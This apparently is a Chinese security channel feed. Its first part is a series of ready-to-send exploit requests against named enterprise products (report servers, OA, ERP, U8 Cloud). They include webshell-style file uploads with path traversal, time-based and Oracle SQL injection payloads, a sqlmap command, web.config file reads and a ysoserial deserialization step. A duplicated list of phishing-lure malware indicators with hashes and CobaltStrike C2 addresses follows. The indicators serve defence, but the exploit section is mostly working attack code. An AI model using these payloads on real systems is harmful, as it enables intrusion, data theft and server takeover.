润乾报表dataSphereServlet接口存在任意文件上传漏洞
body="润乾报表" || body="/raqsoft"
上传后路径:网站根目录
body="润乾报表" || body="/raqsoft"
POST /servlet/dataSphereServlet?action=38 HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 397
Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="openGrpxFile"; filename="539634.jsp"
Content-Type: text/plain
<% out.println("123456"); %>
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="path"
../../../
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="saveServer"
1
--eac629ee4641cb0fe10596fba5e0c5d9--
上传后路径:网站根目录
👍1
启明星辰 天玥网络安全审计系统 SQL注入漏洞
python sqlmap.py -u "https://ip/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" --skip-waf --random-agent --dbs --batch --force-ssl
蓝凌EKPsys_ui_component远程命令执行漏洞
POST /sys/ui/sys_ui_component/sysUiComponent.doHTTP/1.1
Host: Accept:application/json,text/javascript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Length:401
Content-Type:multipart/form-data;
boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
Origin:http://www.baidu.com
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36X-Requested-With:XMLHttpRequest
------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="method"
replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51
赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞
GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
数字通指尖云平台-智慧政务OA PayslipUser SQL注入漏洞
GET /payslip/search/index/userid/www.tgoop.com/time?PayslipUser[user_id]=%28SELECT+4655+FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*Connection: keep-alive
Forwarded from 野火
某云课网校系统 任意文件上传漏洞
POST /api/uploader/uploadImage HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DInOLIXxe9m
X-Requested-With: XMLHttpRequest
------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/gif
<?php phpinfo();?>
------WebKitFormBoundaryLZbmKeasWgo2gPtU--
POST /api/uploader/uploadImage HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DInOLIXxe9m
X-Requested-With: XMLHttpRequest
------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/gif
<?php phpinfo();?>
------WebKitFormBoundaryLZbmKeasWgo2gPtU--
用友U8Cloud MonitorServlet反序列化漏洞
java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.ser
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
payload
用友NC querygoodsgridbycodeSQL注入漏洞
GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1
Host:
Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Pragma: no-cache
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: no-cache
👍1
天问物业ERP系统AreaAvatarDownLoad任意文件读取漏洞
GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
用友U8
Cloud ActionServlet SQL注入漏洞
Cloud ActionServlet SQL注入漏洞
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
livenvr青柿视频管理系统channeltree接口未授权访问
GET /api/v1/device/channeltree?serial=&pcode HTTP/1.1Host:
GET /#/screen HTTP/1.1Host:
目前未复现成功的漏洞
北京筑业建设工程资料同步跟踪检查与流转交互云平台密码重置漏洞
同鑫科技 EHR 系统全系列 SQL 注入漏洞
金和 OA C6CreateGroup 接口注入漏洞
奇安信天擎远程代码执行漏洞
北京筑业建设工程资料同步跟踪检查与流转交互云平台密码重置漏洞
同鑫科技 EHR 系统全系列 SQL 注入漏洞
金和 OA C6CreateGroup 接口注入漏洞
奇安信天擎远程代码执行漏洞
❤3
Forwarded from 野火
http://mp.weixin.qq.com/s?__biz=MzIzMjg0MjM5OQ==&mid=2247487525&idx=1&sn=08b4933e7c3cb369d6ef24ec08249729
2024 重点保障安全意识培训参会人员名单.zip
SHA256:c9d2dca72286c01e068b1995e3aa7772ff9686a492b89e8b8c7b0ecaf715cf40
MD5:eb97e771dc4dd54c18553471d5fe3bbb
C2:110.41.46.45:9111
攻击手法:Rust、APC 调用 CobaltStrike 木马
关于 2024 年公司财务调整的通知.exe
SHA256:d44f628b8e447249ef9ce8871350c52693c1f31cb126307be9f1b2c535053a4a
MD5:248b44673cbb0384180fc62ca972f018
来源:向日葵多协议 RDP 插件
关于 2024 攻防演练员工守则通知.exe
SHA256:bccd982dab220d22689cf81277789ef64b32f575a08f604e1a75da1d5d6aee10
MD5:1c26667276b0f3f69ab55bf8b34fdd22
C2:8.134.249.167:9099
攻击手法:利用微信检测虚拟机 后门木马
集团“星火计划”推荐学员参加选拔考试通知_docx.exe
SHA256:54a28a2bc66c4529aaf2c7b92d724f2a2943dcd12bb960f43e6d34cf90ace700
MD5:7c29a8b9e872af42b5d92dc98f87a917
C2:59.42.126.162:80
来源:CobaltStrike 木马
徐加李简历.docx.exe
SHA256:d86db50d6990d345a1280991b757c770b661d94592a68a95c48b189b7ac4bf50
MD5:b97e176e0ee5987ddfe98e056df343e9
SHA1:3bdde433ae2579d8270110fa6281e2feca7d6225
**金融(渠道经理).zip
SHA256:431d010c90b451c107d4160bb134ff072cf8c7076f16ab516faa2d31ef3c4759
MD5:6330fab9ce531ce8943132272a3cb2a7
相关IP域名/C2:mobile.static.apiproxy.cloud.360.net/mobile.static.apiproxy.cloud.360.net.cdn.dnsv1.com:443
攻击手法:域前置 CobaltStrike 木马
**会议(去除 30 分钟限制).exe
SHA256:ac962605550d120d4d38ba87a10c87027c7ccb3f430475c0104646183bc6f825
MD5:2a04ff4412e48aabdc6fc073ae734cd2
C2:154.12.83.210:54123
攻击手法:资源段解密执行 CobaltStrike 木马
**有限公司社会招聘报名登记表.exe
SHA256:02bbeb4d9d6f13fe1db44a0a2da572b1596d9ff59b79376e8afaeab0ba76a1d6
MD5:09c7199b2bcd0d908a2b8d6867a1b240
C2:2gwxrah28rj0z.cfc-execute.bj.baidubce.com
攻击手法:垃圾代码耗时、Rust CobaltStrike 木马
第三周周报.exe
SHA256:090a42171e42477dbcf0d02a4e901e8eb20cfde8c1765c9a67a84bafd256b2a4
MD5:5cd7b3e9950c5169a5278bdee38438ef
C2:2gwxrah28rj0z.cfc-execute.bj.baidubce.com,downloadlog.oss-cn-chengdu.aliyuncs.com
攻击手法:go 编译,从对象存储中获取到加密载荷 CobaltStrike 木马
测试 tdp (2).zip
SHA256:13d7483a1f1a0b72aaa09ec985797556eeb402c893013a5bc08b706300c5bb3d
MD5:e2eba605cf1b6822e1bd9cb06bd334db
C2:101.200.150.8:8089
攻击手法:原版 CS CobaltStrike 木马
《关于集团网络资产评估管理有关事项的通知》.exe
SHA256:f1d4316a2c7bccf197ee6209389fe1ad7aef8a3b94aebae5548c8d1a05f036cd
MD5:1b50d0cc313552072462327588f93a49
C2:117.50.187.104:443
来源:CobaltStrike 木马
对于**有限公司的异议书.exe
SHA256:7b9c13919a006396b8c60eeaa54bd5728ef70aa7b7890232f3752506243a3e66
MD5:32a8cade2024195a71aeb1ebbd1c296f
C2:175.178.226.246:33333
来源:CobaltStrike 木马
artifact.exe
SHA256:c716ebfc4ae128c5d3b5a882683d7ca833bc4f339909cba4153425d4df765954
MD5:9974ad03575c5a8bfae6f2bb787321ea
C2:39.101.122.168:89
来源:CobaltStrike 木马
***服务平台-存在弱口令漏洞.exe
SHA256:2358438e0c5931b12b2233d449354d3db21e17c350fdf171298c6665514bc655
MD5:aef9c59cb030b7e4038ca9850c95f8a2
C2:www.tencentcloud.site
攻击手法:白加黑 CobaltStrike 木马
杨*.rar
SHA256:7a5fdc1afaadd9d3673b922c45d65061b0ac01f9ffce6b0aec1126d843561f72
MD5:6a0427a10e8e51b1db6c5670fe071f82
相关IP域名:36.249.64.101:443(CDN),www.jinsixian.cn(Host)
攻击手法:域前置 CobaltStrike 木马
***服务平台-存在弱口令漏洞.exe
SHA256:2358438e0c5931b12b2233d449354d3db21e17c350fdf171298c6665514bc655
MD5:aef9c59cb030b7e4038ca9850c95f8a2
C2:www.tencentcloud.site
攻击手法:白加黑 CobaltStrike 木马
Desktop.exe
SHA256:ce19a3062a20d0f2b0bc2a774c11912214aba6e27a191ae31bb96bf6610ca765
MD5:65c7f30fde67152da3176a8b55577acc
C2:101.132.194.179:8081
来源:CobaltStrike 木马
edragent
SHA256:e3ef6b7090bba1ca1590f09538f2261d78dbfbea1435dd99b1e8e12e1636bbe5
MD5:a7a2d23e0b1941876d043f0af6e71110
C2:139.196.210.163:50010
来源:CobaltStrike 木马
2024 重点保障安全意识培训参会人员名单.zip
SHA256:c9d2dca72286c01e068b1995e3aa7772ff9686a492b89e8b8c7b0ecaf715cf40
MD5:eb97e771dc4dd54c18553471d5fe3bbb
C2:110.41.46.45:9111
攻击手法:Rust、APC 调用 CobaltStrike 木马
关于 2024 年公司财务调整的通知.exe
SHA256:d44f628b8e447249ef9ce8871350c52693c1f31cb126307be9f1b2c535053a4a
MD5:248b44673cbb0384180fc62ca972f018
来源:向日葵多协议 RDP 插件
关于 2024 攻防演练员工守则通知.exe
SHA256:bccd982dab220d22689cf81277789ef64b32f575a08f604e1a75da1d5d6aee10
MD5:1c26667276b0f3f69ab55bf8b34fdd22
C2:8.134.249.167:9099
攻击手法:利用微信检测虚拟机 后门木马
集团“星火计划”推荐学员参加选拔考试通知_docx.exe
SHA256:54a28a2bc66c4529aaf2c7b92d724f2a2943dcd12bb960f43e6d34cf90ace700
MD5:7c29a8b9e872af42b5d92dc98f87a917
C2:59.42.126.162:80
来源:CobaltStrike 木马
徐加李简历.docx.exe
SHA256:d86db50d6990d345a1280991b757c770b661d94592a68a95c48b189b7ac4bf50
MD5:b97e176e0ee5987ddfe98e056df343e9
SHA1:3bdde433ae2579d8270110fa6281e2feca7d6225
**金融(渠道经理).zip
SHA256:431d010c90b451c107d4160bb134ff072cf8c7076f16ab516faa2d31ef3c4759
MD5:6330fab9ce531ce8943132272a3cb2a7
相关IP域名/C2:mobile.static.apiproxy.cloud.360.net/mobile.static.apiproxy.cloud.360.net.cdn.dnsv1.com:443
攻击手法:域前置 CobaltStrike 木马
**会议(去除 30 分钟限制).exe
SHA256:ac962605550d120d4d38ba87a10c87027c7ccb3f430475c0104646183bc6f825
MD5:2a04ff4412e48aabdc6fc073ae734cd2
C2:154.12.83.210:54123
攻击手法:资源段解密执行 CobaltStrike 木马
**有限公司社会招聘报名登记表.exe
SHA256:02bbeb4d9d6f13fe1db44a0a2da572b1596d9ff59b79376e8afaeab0ba76a1d6
MD5:09c7199b2bcd0d908a2b8d6867a1b240
C2:2gwxrah28rj0z.cfc-execute.bj.baidubce.com
攻击手法:垃圾代码耗时、Rust CobaltStrike 木马
第三周周报.exe
SHA256:090a42171e42477dbcf0d02a4e901e8eb20cfde8c1765c9a67a84bafd256b2a4
MD5:5cd7b3e9950c5169a5278bdee38438ef
C2:2gwxrah28rj0z.cfc-execute.bj.baidubce.com,downloadlog.oss-cn-chengdu.aliyuncs.com
攻击手法:go 编译,从对象存储中获取到加密载荷 CobaltStrike 木马
测试 tdp (2).zip
SHA256:13d7483a1f1a0b72aaa09ec985797556eeb402c893013a5bc08b706300c5bb3d
MD5:e2eba605cf1b6822e1bd9cb06bd334db
C2:101.200.150.8:8089
攻击手法:原版 CS CobaltStrike 木马
《关于集团网络资产评估管理有关事项的通知》.exe
SHA256:f1d4316a2c7bccf197ee6209389fe1ad7aef8a3b94aebae5548c8d1a05f036cd
MD5:1b50d0cc313552072462327588f93a49
C2:117.50.187.104:443
来源:CobaltStrike 木马
对于**有限公司的异议书.exe
SHA256:7b9c13919a006396b8c60eeaa54bd5728ef70aa7b7890232f3752506243a3e66
MD5:32a8cade2024195a71aeb1ebbd1c296f
C2:175.178.226.246:33333
来源:CobaltStrike 木马
artifact.exe
SHA256:c716ebfc4ae128c5d3b5a882683d7ca833bc4f339909cba4153425d4df765954
MD5:9974ad03575c5a8bfae6f2bb787321ea
C2:39.101.122.168:89
来源:CobaltStrike 木马
***服务平台-存在弱口令漏洞.exe
SHA256:2358438e0c5931b12b2233d449354d3db21e17c350fdf171298c6665514bc655
MD5:aef9c59cb030b7e4038ca9850c95f8a2
C2:www.tencentcloud.site
攻击手法:白加黑 CobaltStrike 木马
杨*.rar
SHA256:7a5fdc1afaadd9d3673b922c45d65061b0ac01f9ffce6b0aec1126d843561f72
MD5:6a0427a10e8e51b1db6c5670fe071f82
相关IP域名:36.249.64.101:443(CDN),www.jinsixian.cn(Host)
攻击手法:域前置 CobaltStrike 木马
***服务平台-存在弱口令漏洞.exe
SHA256:2358438e0c5931b12b2233d449354d3db21e17c350fdf171298c6665514bc655
MD5:aef9c59cb030b7e4038ca9850c95f8a2
C2:www.tencentcloud.site
攻击手法:白加黑 CobaltStrike 木马
Desktop.exe
SHA256:ce19a3062a20d0f2b0bc2a774c11912214aba6e27a191ae31bb96bf6610ca765
MD5:65c7f30fde67152da3176a8b55577acc
C2:101.132.194.179:8081
来源:CobaltStrike 木马
edragent
SHA256:e3ef6b7090bba1ca1590f09538f2261d78dbfbea1435dd99b1e8e12e1636bbe5
MD5:a7a2d23e0b1941876d043f0af6e71110
C2:139.196.210.163:50010
来源:CobaltStrike 木马
👍1